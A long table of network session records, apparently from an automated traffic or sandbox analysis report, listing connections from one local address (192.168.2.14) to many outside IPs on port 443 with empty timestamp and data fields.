                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17428192.168.2.1457772180.237.135.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17429192.168.2.1449294100.172.166.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17430192.168.2.145805812.180.230.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17431192.168.2.1439304175.240.212.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17432192.168.2.1433918136.104.163.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17433192.168.2.145334844.64.1.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17434192.168.2.143881849.186.173.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17435192.168.2.1437940109.144.15.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17436192.168.2.1458964174.115.218.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17437192.168.2.1435690175.38.49.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17438192.168.2.144125687.237.135.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17439192.168.2.143369432.192.9.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17440192.168.2.1445872185.49.165.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17441192.168.2.1443736133.66.192.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17442192.168.2.1455500123.229.210.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17443192.168.2.14390344.65.236.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17444192.168.2.1450136219.153.7.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17445192.168.2.145031854.235.212.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17446192.168.2.1443508190.78.40.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17447192.168.2.145900237.100.197.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17448192.168.2.1448368207.88.160.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17449192.168.2.143389075.238.246.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17450192.168.2.1444496193.160.217.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17451192.168.2.143688463.108.109.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17452192.168.2.144220665.175.235.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17453192.168.2.145750843.31.237.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17454192.168.2.1452382213.85.187.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17455192.168.2.1447916181.220.144.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17456192.168.2.1454604117.72.135.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17457192.168.2.143606683.199.62.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17458192.168.2.144693672.171.18.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17459192.168.2.1438458107.46.180.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17460192.168.2.144141271.80.18.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17461192.168.2.1449116194.241.49.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17462192.168.2.145281276.226.43.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17463192.168.2.1441590109.217.140.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17464192.168.2.1438710222.78.35.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17465192.168.2.145466264.18.68.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17466192.168.2.145872067.241.36.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17467192.168.2.143771854.106.115.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17468192.168.2.1451380161.188.19.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17469192.168.2.1454110202.66.121.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17470192.168.2.1453202115.36.103.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17471192.168.2.143341638.178.65.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17472192.168.2.144025696.199.2.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17473192.168.2.143750620.136.93.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17474192.168.2.145447675.46.5.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17475192.168.2.14422361.215.116.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17476192.168.2.14359128.38.149.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17477192.168.2.1441992190.218.36.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17478192.168.2.1452606193.37.231.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17479192.168.2.145347896.55.124.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17480192.168.2.143424835.9.33.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17481192.168.2.144767668.142.209.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17482192.168.2.14351764.239.104.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17483192.168.2.143281431.161.52.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17484192.168.2.1439282112.208.0.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17485192.168.2.1457400200.218.63.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17486192.168.2.1456942220.253.26.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17487192.168.2.144637025.59.214.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17488192.168.2.1440388126.170.83.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17489192.168.2.1450220107.34.153.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17490192.168.2.144301625.249.143.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17491192.168.2.1438282115.106.2.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17492192.168.2.1440174152.223.165.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17493192.168.2.1433752218.100.133.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17494192.168.2.143523083.229.132.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17495192.168.2.1453170219.75.115.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17496192.168.2.1458474175.151.210.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17497192.168.2.143809068.111.20.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17498192.168.2.1442892104.100.99.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17499192.168.2.143703897.162.57.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17500192.168.2.145422227.2.232.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17501192.168.2.144250491.94.155.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17502192.168.2.1442796102.96.129.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17503192.168.2.1439224193.251.50.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17504192.168.2.1454480161.82.26.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17505192.168.2.1457324158.228.163.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17506192.168.2.1440132138.8.216.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17507192.168.2.1433766141.164.226.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17508192.168.2.1441568104.183.177.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17509192.168.2.146091287.201.154.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17510192.168.2.14446841.137.81.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17511192.168.2.1446250107.37.131.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17512192.168.2.14409681.212.199.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17513192.168.2.143383437.47.154.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17514192.168.2.145576851.116.241.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17515192.168.2.1448274114.9.154.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17516192.168.2.1457140195.111.100.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17517192.168.2.1449766174.133.85.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17518192.168.2.1433514150.251.243.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17519192.168.2.144191288.4.115.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17520192.168.2.1434536169.94.253.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17521192.168.2.143775051.136.222.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17522192.168.2.1457938216.219.229.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17523192.168.2.1457250222.111.251.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17524192.168.2.1437438103.161.16.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17525192.168.2.1447550137.207.215.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17526192.168.2.145080654.136.60.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17527192.168.2.1433672181.93.87.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17528192.168.2.1450702118.182.6.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17529192.168.2.1437570155.108.4.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17530192.168.2.144564886.15.1.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17531192.168.2.1459216182.43.102.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17532192.168.2.144037892.226.236.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17533192.168.2.1450970114.154.39.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17534192.168.2.1446310134.158.91.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17535192.168.2.1446320115.213.182.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17536192.168.2.143819870.15.211.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17537192.168.2.144128676.208.132.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17538192.168.2.144260070.212.240.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17539192.168.2.1452080119.111.22.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17540192.168.2.144679089.139.65.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17541192.168.2.143782417.105.12.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17542192.168.2.1460816168.72.243.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17543192.168.2.1443504182.127.141.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17544192.168.2.144388897.234.165.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17545192.168.2.145736051.181.66.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17546192.168.2.1443666140.66.191.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17547192.168.2.1456044200.179.14.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17548192.168.2.145878288.57.220.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17549192.168.2.1434182188.54.84.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17550192.168.2.145757298.40.84.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17551192.168.2.1445868209.63.129.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17552192.168.2.1455382107.234.19.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17553192.168.2.1457984162.38.214.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17554192.168.2.1440072138.210.140.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17555192.168.2.145410840.28.145.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17556192.168.2.144980424.26.191.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17557192.168.2.1455248211.100.151.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17558192.168.2.1444348105.204.82.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17559192.168.2.145458292.2.250.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17560192.168.2.1454532104.195.94.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17561192.168.2.144089882.225.245.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17562192.168.2.145364889.133.219.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17563192.168.2.1458168135.248.96.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17564192.168.2.1459558153.98.107.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17565192.168.2.1434940130.149.146.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17566192.168.2.1440736125.132.230.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17567192.168.2.145509296.162.142.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17568192.168.2.14538484.72.171.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17569192.168.2.1456726182.157.119.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17570192.168.2.143503871.8.254.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17571192.168.2.144522096.166.252.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17572192.168.2.1440590145.168.207.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17573192.168.2.1445564210.127.143.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17574192.168.2.1448830172.32.251.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17575192.168.2.1457276186.234.111.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17576192.168.2.1445634212.237.201.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17577192.168.2.1456248220.10.55.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17578192.168.2.1433372179.214.125.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17579192.168.2.1458732154.215.112.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17580192.168.2.144145646.173.68.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17581192.168.2.143629072.202.77.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17582192.168.2.1453046136.4.202.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17583192.168.2.1447130142.107.9.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17584192.168.2.1438046206.213.255.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17585192.168.2.144489096.20.8.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17586192.168.2.1458330136.108.102.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17587192.168.2.1452940181.188.225.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17588192.168.2.143659273.126.136.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17589192.168.2.1442116202.253.62.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17590192.168.2.143458434.183.192.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17591192.168.2.1433518125.101.20.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17592192.168.2.1452866220.86.121.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17593192.168.2.145598065.118.201.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17594192.168.2.144076427.195.108.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17595192.168.2.1454922111.111.143.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17596192.168.2.14455008.193.163.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17597192.168.2.1460836199.146.65.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17598192.168.2.1451110115.24.113.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17599192.168.2.1460460105.40.179.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17600192.168.2.1451222154.1.138.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17601192.168.2.144583458.126.230.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17602192.168.2.145367878.60.179.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17603192.168.2.1451570143.160.159.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17604192.168.2.144672453.33.181.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17605192.168.2.1447816160.232.109.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17606192.168.2.143311859.205.23.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17607192.168.2.1455694135.152.204.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17608192.168.2.145121244.188.94.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17609192.168.2.145868844.122.89.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17610192.168.2.1449906205.93.202.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17611192.168.2.1442896124.41.183.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17612192.168.2.1447462182.216.210.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17613192.168.2.1459544125.234.146.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17614192.168.2.1460902132.102.33.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17615192.168.2.1458694144.241.121.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17616192.168.2.1435806163.46.153.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17617192.168.2.1458810140.128.167.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17618192.168.2.1442510137.249.27.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17619192.168.2.1457686216.231.246.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17620192.168.2.1448778221.144.126.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17621192.168.2.1441900208.54.239.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17622192.168.2.1436944198.250.105.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17623192.168.2.1460248105.89.141.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17624192.168.2.1434984184.248.175.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17625192.168.2.1447330113.32.122.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17626192.168.2.143410045.89.111.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17627192.168.2.144307469.83.118.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17628192.168.2.1455230161.142.175.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17629192.168.2.14434509.161.131.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17630192.168.2.1446126168.63.159.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17631192.168.2.145595281.202.79.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17632192.168.2.1455898185.243.11.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17633192.168.2.1438608168.128.254.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17634192.168.2.14538465.103.59.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17635192.168.2.1448552211.3.132.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17636192.168.2.1450920204.91.167.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17637192.168.2.1455560119.235.9.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17638192.168.2.146004212.169.224.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17639192.168.2.1448026176.238.160.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
